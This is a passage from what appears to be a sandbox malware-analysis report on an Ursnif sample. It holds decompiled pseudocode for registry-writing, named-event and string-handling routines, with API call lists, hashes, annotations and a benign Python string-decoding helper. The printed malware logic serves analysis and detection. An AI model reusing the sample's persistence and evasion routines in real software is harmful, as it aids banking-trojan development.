                                       					_t64 =  *0x4dea318; // 0x54a9da0
                                       					_t16 = _t64 + 0xc; // 0x54a9ec2
                                       					_t65 = E04DE4208(_t64,  *_t16);
                                       					_a24 = _t65;
                                       					if(_t65 == 0) {
                                       						L14:
                                       						_t29 = _t101 + 0x14; // 0x102
                                       						_t33 = _t101 + 0x10; // 0x3d04de90, executed
                                       						// same helper that stores the 0x28-byte value below: (ctx, hive, path, name, data, size)
                                       						_t67 = E04DE4C88(_t97,  *_t33, _t91, _a8,  *0x4dea3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                                       						if(_t67 == 0) {
                                       							_t68 =  *0x4dea348; // 0x6bd5a8
                                       							if(_t98 == 0) {
                                       								_t35 = _t68 + 0x4deba3f; // 0x4d4c4b48 = "HKLM"
                                       								_t69 = _t35;
                                       							} else {
                                       								_t34 = _t68 + 0x4deb8e7; // 0x55434b48 = "HKCU"
                                       								_t69 = _t34;
                                       							}
                                       							if(E04DE26E7(_t69,  *0x4dea3d4,  *0x4dea3d8,  &_a24,  &_a16) == 0) {
                                       								if(_t98 == 0) {
                                       									_t71 =  *0x4dea348; // 0x6bd5a8
                                       									_t44 = _t71 + 0x4deb846; // 0x74666f53 = "Soft"
                                       									_t73 = E04DE4208(_t44, _t44);
                                       									_t99 = _t73;
                                       									if(_t73 == 0) {
                                       										_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                       									} else {
                                       										_t47 = _t101 + 0x10; // 0x3d04de90
                                       										E04DE3B76( *_t47, _t91, _a8,  *0x4dea3d8, _a24);
                                       										_t49 = _t101 + 0x10; // 0x3d04de90
                                       										E04DE3B76( *_t49, _t91, _t99,  *0x4dea3d0, _a16); // HKLM variant: second write goes under the "Soft..." string
                                       										E04DE4C73(_t99);
                                       									}
                                       								} else {
                                       									_t40 = _t101 + 0x10; // 0x3d04de90, executed
                                       									E04DE3B76( *_t40, _t91, _a8,  *0x4dea3d8, _a24); // executed
                                       									_t43 = _t101 + 0x10; // 0x3d04de90
                                       									E04DE3B76( *_t43, _t91, _a8,  *0x4dea3d0, _a16); // HKCU variant: both writes use the caller-derived path
                                       								}
                                       								if( *_t101 != 0) {
                                       									E04DE4C73(_a24);
                                       								} else {
                                       									 *_t101 = _a16;
                                       								}
                                       							}
                                       						}
                                       						goto L27;
                                       					}
                                       					_t21 = _t101 + 0x10; // 0x3d04de90, executed
                                       					_t81 = E04DE4E0B( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed: reads the value, data pointer into _v16, size into _v12
                                       					if(_t81 == 0) {
                                       						_t100 = _v16;
                                       						if(_v12 == 0x28) { // exactly 40 bytes: clear its first dword and store it back
                                       							 *_t100 =  *_t100 & _t81; // _t81 == 0 here, so this zeroes the dword
                                       							_t26 = _t101 + 0x10; // 0x3d04de90
                                       							E04DE4C88(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                       						}
                                       						E04DE4C73(_t100);
                                       						_t98 = _a16;
                                       					}
                                       					E04DE4C73(_a24);
                                       					goto L14;
                                       				}
                                       				// HKCU path: name longer than 8, name + 0x2a below 0x104 (MAX_PATH), and no '_' (0x5f) in it
                                       				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                       					goto L29;
                                       				} else {
                                       					_t97 = _a8;
                                       					E04DE799E(_t98, _a8,  &_v284); // (length, name, local buffer)
                                       					__imp__(_t102 + _t98 - 0x117,  *0x4dea3dc); // same unnamed import, applied just past the copied name
                                       					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c; // '\\' separator between name and suffix
                                       					_t91 = 0x80000003; // HKEY_CURRENT_USER
                                       					goto L6;
                                       				}
                                       			}
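                                       The decompiled listings above (E04DE74E0 and E04DE6E20) and the API lists (the lstrlen argument 253D7325 under function 04DE403D, the SysAllocString argument 0070006F at 04DE3C6E) all show the sample's string constants as little-endian dwords. The following helper decodes them in bulk. It is an added example written for this report, not Joe Sandbox or Ursnif code. It assumes the listing convention visible on this page: when an argument points at a string, Joe Sandbox prints the first four bytes of that string as one hex dword, and the decompiler's `// 0x...` comment on a base-relative offset does the same (the GetProcAddress argument 7243775A matches the comment 0x7243775a). Only four bytes are recoverable, so "ZwCr" or "Soft" stay prefixes and full export or key names are not reconstructed. The SAMPLE lines are copied from the listings above; pointers, NULL arguments and numeric flags such as 000F001F drop out because they are not printable.

```python
"""Decode the 4-byte string fragments that a Joe Sandbox decompiler listing
shows as little-endian dwords (`// 0x4c44544e`, `GetProcAddress(..., 7243775A)`).

Added example for this report, not Joe Sandbox or Ursnif code. Assumption:
a pointer-to-string argument is printed as the first four bytes of the
pointed-to string, as observed in the listing above."""
import re
import struct

# Constructed sample: lines copied verbatim from the E04DE74E0 / E04DE6E20
# listings and the "APIs" lists in this report.
SAMPLE = """\
_t1 = _t23 + 0x4deb11a; // 0x4c44544e
_t2 = _t26 + 0x4deb769; // 0x7243775a
_t5 = _t30 + 0x4deb756; // 0x614d775a
_t7 = _t33 + 0x4deb40b; // 0x6e55775a
_t9 = _t36 + 0x4deb4d2; // 0x4e6c7452
_t11 = _t39 + 0x4deb779; // 0x6c43775a
_t35 = _t68 + 0x4deba3f; // 0x4d4c4b48
_t34 = _t68 + 0x4deb8e7; // 0x55434b48
_t44 = _t71 + 0x4deb846; // 0x74666f53
GetProcAddress.KERNEL32(00000000,7243775A), ref: 04DE7527
lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,76D8C740,?,?,04DE653D,?,054A95B0), ref: 04DE3764
SysAllocString.OLEAUT32(0070006F), ref: 04DE3C6E
NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,77004EE0,00000000,00000000,04DE759F), ref: 04DE2634
"""

# `_tN = ...; // 0xXXXXXXXX`  -> (label _tN, dword)
COMMENT_RE = re.compile(r"^\s*(\w+)\s*=.*//\s*0x([0-9a-fA-F]{8})\b")
# `Api.MODULE(arg,arg,...)`   -> (Api, argument list)
API_RE = re.compile(r"\b([A-Za-z_]\w*)\.[A-Za-z0-9_]+\(([^)]*)\)")


def is_printable(ch: int) -> bool:
    return 0x20 <= ch < 0x7F


def decode_dword(value: int):
    """Return (ascii, utf16) readings of a little-endian dword.

    Each element is None unless every character is printable ASCII. The
    UTF-16LE reading covers BSTR/OLEAUT32 arguments such as 0070006F."""
    raw = struct.pack("<I", value)
    narrow = raw.decode("ascii") if all(is_printable(b) for b in raw) else None
    try:
        wide = raw.decode("utf-16-le")
    except UnicodeDecodeError:  # lone surrogate half
        wide = None
    if wide is not None and not all(is_printable(ord(c)) for c in wide):
        wide = None
    return narrow, wide


def extract_candidates(text: str):
    """Yield (label, dword) for decompiler comments and 8-hex-digit API args."""
    for line in text.splitlines():
        m = COMMENT_RE.search(line)
        if m:
            yield m.group(1), int(m.group(2), 16)
            continue
        m = API_RE.search(line)
        if m:
            for i, arg in enumerate(m.group(2).split(",")):
                arg = arg.strip()
                if re.fullmatch(r"[0-9A-Fa-f]{8}", arg):
                    yield f"{m.group(1)} arg{i}", int(arg, 16)


def decode_listing(text: str) -> dict:
    """Map each label to its string reading; non-printable dwords (pointers,
    NULLs, access masks) are left out."""
    out = {}
    for label, dword in extract_candidates(text):
        narrow, wide = decode_dword(dword)
        if narrow is not None:
            out[label] = narrow
        elif wide is not None:
            out[label] = wide
    return out


if __name__ == "__main__":
    for label, text in decode_listing(SAMPLE).items():
        print(f"{label:24s} {text!r}")
```

                                       Read together, the decoded prefixes line up with the surrounding evidence on this page: "NTDL" for the GetModuleHandleA argument, "ZwCr"/"ZwMa"/"ZwUn"/"RtlN"/"ZwCl" for the five GetProcAddress lookups that precede NtCreateSection, "HKLM"/"HKCU"/"Soft" next to the 0x80000002/0x80000003 hive constants, and "%s=%" next to the sprintf call and the "=" String ID in the 04DE403D block.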

                                      APIs
                                      • StrChrA.SHLWAPI(04DE2A82,0000005F,00000000,00000000,00000104), ref: 04DE6E53
                                      • lstrcpy.KERNEL32(?,?), ref: 04DE6E80
                                        • Part of subcall function 04DE4208: lstrlen.KERNEL32(?,00000000,054A9DA0,00000000,04DE2263,054A9FC3,69B25F44,?,?,?,?,69B25F44,00000005,04DEA00C,4D283A53,?), ref: 04DE420F
                                        • Part of subcall function 04DE4208: mbstowcs.NTDLL ref: 04DE4238
                                        • Part of subcall function 04DE4208: memset.NTDLL ref: 04DE424A
                                        • Part of subcall function 04DE3B76: lstrlenW.KERNEL32(?,?,?,04DE6FE9,3D04DE90,80000002,04DE2A82,04DE744C,74666F53,4D4C4B48,04DE744C,?,3D04DE90,80000002,04DE2A82,?), ref: 04DE3B9B
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      • lstrcpy.KERNEL32(?,00000000), ref: 04DE6EA2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                      • String ID: ($\
                                      • API String ID: 3924217599-1512714803
                                      • Opcode ID: 26b5cc2f8de1ce676dbe4677d3e263839dcdbf06cc6d51f154679f2d32774029
                                      • Instruction ID: 75d98509810c4922c6055cd2dc75a97b71fa16d020ef29da5156ae351317872f
                                      • Opcode Fuzzy Hash: 26b5cc2f8de1ce676dbe4677d3e263839dcdbf06cc6d51f154679f2d32774029
                                      • Instruction Fuzzy Hash: D1512A7160020AEFDF22BFA2DC44EBA7BB9FF04354F008555FA1596260D736F925AB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 66%
                                      			E04DE5803(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                                      				void* _v8;
                                      				char _v48;
                                      				void* __edi;
                                      				intOrPtr _t22;
                                      				void* _t26;
                                      				intOrPtr _t30;
                                      				intOrPtr _t37;
                                      				intOrPtr* _t43;
                                      				void* _t44;
                                      				void* _t47;
                                      				intOrPtr* _t49;
                                      				void* _t50;
                                      				intOrPtr _t51;
                                      
                                      				_t47 = __edx;
                                      				_t44 = __ecx;
                                      				_t43 = _a16;
                                      				_t49 = __eax;
                                      				_t22 =  *0x4dea348; // 0x6bd5a8
                                      				_t2 = _t22 + 0x4deb682; // 0x657a6973
                                      				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
                                      				_t51 =  *0x4dea3e0; // 0x54a9ba8
                                      				_push(0x800);
                                      				_push(0);
                                      				_push( *0x4dea2d8);
                                      				if( *0x4dea2ec >= 5) {
                                      					_t26 = RtlAllocateHeap(); // executed
                                      					if(_t26 == 0) {
                                      						L6:
                                      						_a4 = 8;
                                      						L7:
                                      						if(_a4 != 0) {
                                      							L10:
                                      							 *0x4dea2ec =  *0x4dea2ec + 1;
                                      							L11:
                                      							return _a4;
                                      						}
                                      						_t52 = _a16;
                                      						 *_t49 = _a16;
                                      						_t50 = _v8;
                                      						 *_t43 = E04DE2087(_t52, _t50); // executed
                                      						_t30 = E04DE6D7F(_t50, _t52); // executed
                                      						if(_t30 != 0) {
                                      							 *_a8 = _t50;
                                      							 *_a12 = _t30;
                                      							if( *0x4dea2ec < 5) {
                                      								 *0x4dea2ec =  *0x4dea2ec & 0x00000000;
                                      							}
                                      							goto L11;
                                      						}
                                      						_a4 = 0xbf;
                                      						E04DE3F62();
                                      						HeapFree( *0x4dea2d8, 0, _t50);
                                      						goto L10;
                                      					}
                                      					_t37 = E04DE636D(_a4, _t47, _t51,  &_v48,  &_v8,  &_a16, _t26);
                                      					L5:
                                      					_a4 = _t37;
                                      					goto L7;
                                      				}
                                      				if(RtlAllocateHeap() == 0) {
                                      					goto L6;
                                      				}
                                      				_t37 = E04DE59E2(_a4, _t44, _t47, _t51,  &_v48,  &_v8,  &_a16, _t38);
                                      				goto L5;
                                      			}

                                      APIs
                                      • wsprintfA.USER32 ref: 04DE5825
                                      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04DE584A
                                        • Part of subcall function 04DE59E2: GetTickCount.KERNEL32 ref: 04DE59F6
                                        • Part of subcall function 04DE59E2: wsprintfA.USER32 ref: 04DE5A46
                                        • Part of subcall function 04DE59E2: wsprintfA.USER32 ref: 04DE5A63
                                        • Part of subcall function 04DE59E2: wsprintfA.USER32 ref: 04DE5A83
                                        • Part of subcall function 04DE59E2: wsprintfA.USER32 ref: 04DE5AAF
                                        • Part of subcall function 04DE59E2: HeapFree.KERNEL32(00000000,00000000), ref: 04DE5AC1
                                        • Part of subcall function 04DE59E2: wsprintfA.USER32 ref: 04DE5AE2
                                        • Part of subcall function 04DE59E2: HeapFree.KERNEL32(00000000,00000000), ref: 04DE5AF2
                                      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04DE586C
                                      • HeapFree.KERNEL32(00000000,?,?), ref: 04DE58D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: wsprintf$Heap$Free$Allocate$CountTick
                                      • String ID: FNwPq
                                      • API String ID: 1428766365-3591455833
                                      • Opcode ID: 87af9e00c7d958a52e1bd58867e72e453506b962b71b32fd65aa73461f182884
                                      • Instruction ID: e2928ee5dca2ea297d48a0dd62acef2841be8cda805f97b7e38d81bc5ebab0c7
                                      • Opcode Fuzzy Hash: 87af9e00c7d958a52e1bd58867e72e453506b962b71b32fd65aa73461f182884
                                      • Instruction Fuzzy Hash: F5312A71601209FBCB01EF96E8A4AEE3BBCFB08354F108452F905AB341D774E955DBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 22%
                                      			E04DE70AE(signed int __eax, signed int _a4, signed int _a8) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				intOrPtr _v16;
                                      				signed int _v20;
                                      				intOrPtr _t81;
                                      				char _t83;
                                      				signed int _t90;
                                      				signed int _t97;
                                      				signed int _t99;
                                      				char _t101;
                                      				unsigned int _t102;
                                      				intOrPtr _t103;
                                      				char* _t107;
                                      				signed int _t110;
                                      				signed int _t113;
                                      				signed int _t118;
                                      				signed int _t122;
                                      				intOrPtr _t124;
                                      
                                      				_t102 = _a8;
                                      				_t118 = 0;
                                      				_v20 = __eax;
                                      				_t122 = (_t102 >> 2) + 1;
                                      				_v8 = 0;
                                      				_a8 = 0;
                                      				_t81 = E04DE4DF6(_t122 << 2);
                                      				_v16 = _t81;
                                      				if(_t81 == 0) {
                                      					_push(8);
                                      					_pop(0);
                                      					L37:
                                      					return 0;
                                      				}
                                      				_t107 = _a4;
                                      				_a4 = _t102;
                                      				_t113 = 0;
                                      				while(1) {
                                      					_t83 =  *_t107;
                                      					if(_t83 == 0) {
                                      						break;
                                      					}
                                      					if(_t83 == 0xd || _t83 == 0xa) {
                                      						if(_t118 != 0) {
                                      							if(_t118 > _v8) {
                                      								_v8 = _t118;
                                      							}
                                      							_a8 = _a8 + 1;
                                      							_t118 = 0;
                                      						}
                                      						 *_t107 = 0;
                                      						goto L16;
                                      					} else {
                                      						if(_t118 != 0) {
                                      							L10:
                                      							_t118 = _t118 + 1;
                                      							L16:
                                      							_t107 = _t107 + 1;
                                      							_t15 =  &_a4;
                                      							 *_t15 = _a4 - 1;
                                      							if( *_t15 != 0) {
                                      								continue;
                                      							}
                                      							break;
                                      						}
                                      						if(_t113 == _t122) {
                                      							L21:
                                      							if(_a8 <= 0x20) {
                                      								_push(0xb);
                                      								L34:
                                      								_pop(0);
                                      								L35:
                                      								E04DE4C73(_v16);
                                      								goto L37;
                                      							}
                                      							_t24 = _v8 + 5; // 0xcdd8d2f8
                                      							_t103 = E04DE4DF6((_v8 + _t24) * _a8 + 4);
                                      							if(_t103 == 0) {
                                      								_push(8);
                                      								goto L34;
                                      							}
                                      							_t90 = _a8;
                                      							_a4 = _a4 & 0x00000000;
                                      							_v8 = _v8 & 0x00000000;
                                      							_t124 = _t103 + _t90 * 4;
                                      							if(_t90 <= 0) {
                                      								L31:
                                      								 *0x4dea318 = _t103;
                                      								goto L35;
                                      							}
                                      							do {
                                      								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                      								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                      								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                      								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                      								_v12 = _v12 & 0x00000000;
                                      								if(_a4 <= 0) {
                                      									goto L30;
                                      								} else {
                                      									goto L26;
                                      								}
                                      								while(1) {
                                      									L26:
                                      									_t99 = _v12;
                                      									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                      									if(_t99 == 0) {
                                      										break;
                                      									}
                                      									_v12 = _v12 + 1;
                                      									if(_v12 < _a4) {
                                      										continue;
                                      									}
                                      									goto L30;
                                      								}
                                      								_v8 = _v8 - 1;
                                      								L30:
                                      								_t97 = _a4;
                                      								_a4 = _a4 + 1;
                                      								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                      								__imp__(_t124);
                                      								_v8 = _v8 + 1;
                                      								_t124 = _t124 + _t97 + 1;
                                      							} while (_v8 < _a8);
                                      							goto L31;
                                      						}
                                      						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                      						_t101 = _t83;
                                      						if(_t83 - 0x61 <= 0x19) {
                                      							_t101 = _t101 - 0x20;
                                      						}
                                      						 *_t107 = _t101;
                                      						_t113 = _t113 + 1;
                                      						goto L10;
                                      					}
                                      				}
                                      				if(_t118 != 0) {
                                      					if(_t118 > _v8) {
                                      						_v8 = _t118;
                                      					}
                                      					_a8 = _a8 + 1;
                                      				}
                                      				goto L21;
                                      			}

                                      APIs
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • lstrcpy.KERNEL32(69B25F45,00000020), ref: 04DE71AB
                                      • lstrcat.KERNEL32(69B25F45,00000020), ref: 04DE71C0
                                      • lstrcmp.KERNEL32(00000000,69B25F45), ref: 04DE71D7
                                      • lstrlen.KERNEL32(69B25F45), ref: 04DE71FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                      • String ID:
                                      • API String ID: 3214092121-3916222277
                                      • Opcode ID: 60934489f68116915ecf5f614e0b83862c1b7823897c0327daf23dcf58db7671
                                      • Instruction ID: 8e6c85196b6c1d63f27df5fde458f09048849b397ba6b3e7aed840b57a2fc645
                                      • Opcode Fuzzy Hash: 60934489f68116915ecf5f614e0b83862c1b7823897c0327daf23dcf58db7671
                                      • Instruction Fuzzy Hash: 0D519071A00208EBDF61EFAAC8846BDBBF6FF45314F15909AE8559F201D731EA41DB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			// Annotations: the trailing "@04de...." markers are the report's own per-line instruction addresses,
                                      			// folded in from the address column that the report prints after the listing (lines without an
                                      			// address carry no marker). The other comments are editorial notes on what the visible code does;
                                      			// callees named E04DE.... are as recovered by the decompiler.
                                      			E04DE1666(signed int _a4, signed int* _a8) {
                                      				void* __ecx;
                                      				void* __edi;
                                      				signed int _t6;
                                      				intOrPtr _t8;
                                      				intOrPtr _t12;
                                      				long _t14;
                                      				void* _t18;
                                      				WCHAR* _t19;
                                      				long _t20;
                                      				void* _t25;
                                      				signed int* _t28;
                                      				CHAR* _t30;
                                      				long _t31;
                                      				WCHAR** _t32;
                                      
                                      				_t6 =  *0x4dea310; // 0xd448b889 @04de1667
                                      				_t32 = _a4; // @04de166e  _a4 points at a WCHAR* (the string split by StrChrW below)
                                      				_a4 = _t6 ^ 0x109a6410; // @04de1678  global XORed with a constant; stored back into the _a4 slot and not read again in this function
                                      				_t8 =  *0x4dea348; // 0x6bd5a8 @04de167c
                                      				_t3 = _t8 + 0x4deb87e; // 0x61636f4c @04de1682  0x61636f4c is "Loca" in little-endian ASCII: the start of the name string E04DE4B16 assembles (lstrcpy/lstrcat in its API list), consistent with a "Local\..." object name
                                      				_t25 = 0; // @04de1691  event handle, none yet
                                      				_t30 = E04DE4B16(_t3, 1); // @04de1698  build the name string on the heap
                                      				if(_t30 != 0) { // @04de169c
                                      					_t25 = CreateEventA(0x4dea34c, 1, 0, _t30); // @04de16ae  security attributes from a global; manual-reset, initially non-signalled, named
                                      					E04DE4C73(_t30); // @04de16b0  free the name string (RtlFreeHeap, see API list)
                                      				} // @04de16b0
                                      				_t12 =  *0x4dea2fc; // 0x4000000a @04de16b5
                                      				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) { // @04de16bc  fallback path when the global is <= 6 (signed) or there is no command string; also reached when the E04DE3E6C path below fails
                                      					L12: // @04de1713
                                      					_t28 = _a8; // @04de1713  optional flags out-parameter
                                      					if(_t28 != 0) { // @04de1719
                                      						 *_t28 =  *_t28 | 0x00000001; // @04de171b  set bit 0 before the call; cleared below on failure or timeout
                                      					} // @04de171b
                                      					_t14 = E04DE2384(_t32, 0); // executed @04de1720
                                      					_t31 = _t14; // @04de1725
                                      					if(_t31 == 0 && _t25 != 0) { // @04de1729
                                      						_t31 = WaitForSingleObject(_t25, 0x4e20); // @04de173b  0x4e20 = 20000 ms; 0 (WAIT_OBJECT_0) means the event was signalled within 20 s
                                      					} // @04de173b
                                      					if(_t28 != 0 && _t31 != 0) { // @04de173f
                                      						 *_t28 =  *_t28 & 0xfffffffe; // @04de1745  clear bit 0 again
                                      					} // @04de1745
                                      					goto L20;
                                      				} else { // @04de16cc
                                      					_t18 = E04DE6DB6(); // executed @04de16cc
                                      					if(_t18 != 0) { // @04de16d3
                                      						goto L12;
                                      					}
                                      					_t19 = StrChrW( *_t32, 0x20); // @04de16da  0x20 = L' ': locate the first space in the wide string
                                      					if(_t19 != 0) { // @04de16e2
                                      						 *_t19 = 0; // @04de16e6  terminate the first token in place
                                      						_t19 =  &(_t19[1]); // @04de16ea  remainder after the space
                                      					} // @04de16ea
                                      					_t20 = E04DE3E6C(0,  *_t32, _t19, 0); // executed @04de16f2  first token and remainder are passed as separate arguments
                                      					_t31 = _t20; // @04de16f7
                                      					if(_t31 == 0) { // @04de16fb
                                      						if(_t25 == 0) { // @04de16ff
                                      							L22: // @04de1754
                                      							return _t31; // @04de175a
                                      						} // @04de175a
                                      						_t31 = WaitForSingleObject(_t25, 0x4e20); // @04de170d  same 20 s wait on the event
                                      						if(_t31 == 0) { // @04de1711
                                      							L20: // @04de1748
                                      							if(_t25 != 0) { // @04de174a
                                      								CloseHandle(_t25); // @04de174d
                                      							} // @04de174d
                                      							goto L22;
                                      						} // @04de174a
                                      					} // @04de1711
                                      					goto L12;
                                      				} // @04de16fb
                                      			}

                                      APIs
                                        • Part of subcall function 04DE4B16: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,054A9DA0,00000000,?,?,69B25F44,00000005,04DEA00C,4D283A53,?,?), ref: 04DE4B4C
                                        • Part of subcall function 04DE4B16: lstrcpy.KERNEL32(00000000,00000000), ref: 04DE4B70
                                        • Part of subcall function 04DE4B16: lstrcat.KERNEL32(00000000,00000000), ref: 04DE4B78
                                      • CreateEventA.KERNEL32(04DEA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04DE2AA1,?,?,?), ref: 04DE16A7
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      • StrChrW.SHLWAPI(04DE2AA1,00000020,61636F4C,00000001,00000000,?,?,00000000,?,04DE2AA1,?,?,?), ref: 04DE16DA
                                      • WaitForSingleObject.KERNEL32(00000000,00004E20,04DE2AA1,00000000,00000000,?,00000000,?,04DE2AA1,?,?,?), ref: 04DE1707
                                      • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04DE2AA1,?,?,?), ref: 04DE1735
                                      • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04DE2AA1,?,?,?), ref: 04DE174D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                      • String ID:
                                      • API String ID: 73268831-0
                                      • Opcode ID: 95bee7b66d0dc3a170340f300cdcf61444eaff02f33dc7d7e430efc43b1d2fc6
                                      • Instruction ID: 9c83b06c815051cf69b319ab8e42b8f1b10c2c505bc39b4dace52f1866cb2d40
                                      • Opcode Fuzzy Hash: 95bee7b66d0dc3a170340f300cdcf61444eaff02f33dc7d7e430efc43b1d2fc6
                                      • Instruction Fuzzy Hash: B521C132700612DBD731BAAB9C84A7E73A8FB88B24B450629FD01AB240DB74EC018760
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.568538445.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_2f10000_rundll32.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID: X
                                      • API String ID: 544645111-3081909835
                                      • Opcode ID: e4223aaaa941ca7609270bea9d228aba8bcdc66d6d3ef9be42c7e8713cb92b5a
                                      • Instruction ID: f0f41d5e22c98a2ef995b235f085ae1080806971f0395e7bd76c77147cc25c1e
                                      • Opcode Fuzzy Hash: e4223aaaa941ca7609270bea9d228aba8bcdc66d6d3ef9be42c7e8713cb92b5a
                                      • Instruction Fuzzy Hash: D4B1BEB5E002288FDB54CF98C990B9DBBF1FF48304F1581AAD908AB356D775A985CF41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 79%
                                      			// Annotations: the trailing "@04de...." markers are the report's own per-line instruction addresses,
                                      			// folded in from the address column that the report prints after the listing; the other comments are
                                      			// editorial. Net effect of the routine: replace the first occurrence of the string _a8 inside the
                                      			// __eax-byte buffer _a4 with the _a16-byte block _a12, writing a new heap buffer to *_a20 and its
                                      			// length to *_a24. Returns 0 on success, 8 if the allocation fails, 0xb if the needle is not found.
                                      			E04DE250D(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                                      				char _v5;
                                      				signed int _v12;
                                      				intOrPtr _v16;
                                      				char _t28;
                                      				void* _t33;
                                      				void* _t38;
                                      				void* _t45;
                                      				char* _t46;
                                      				void* _t48;
                                      				char* _t56;
                                      				char* _t57;
                                      				intOrPtr _t59;
                                      				void* _t60;
                                      
                                      				_t56 = _a4; // @04de2515  source buffer
                                      				_t60 = __eax; // @04de2518  source length in bytes, passed in eax
                                      				_v12 = 0xb; // @04de251a  default status 0xb = ERROR_BAD_FORMAT (needle not found)
                                      				if(_t56 != 0 && __eax != 0) { // @04de2523
                                      					_t5 = _t60 - 1; // -1 @04de2535
                                      					_t46 =  &(_t56[_t5]); // @04de2535  pointer to the last byte of the buffer
                                      					_t28 =  *_t46; // @04de2539
                                      					_v5 = _t28; // @04de253b  save that byte
                                      					 *_t46 = 0; // @04de253e  temporarily NUL-terminate so StrStrA cannot run past the buffer
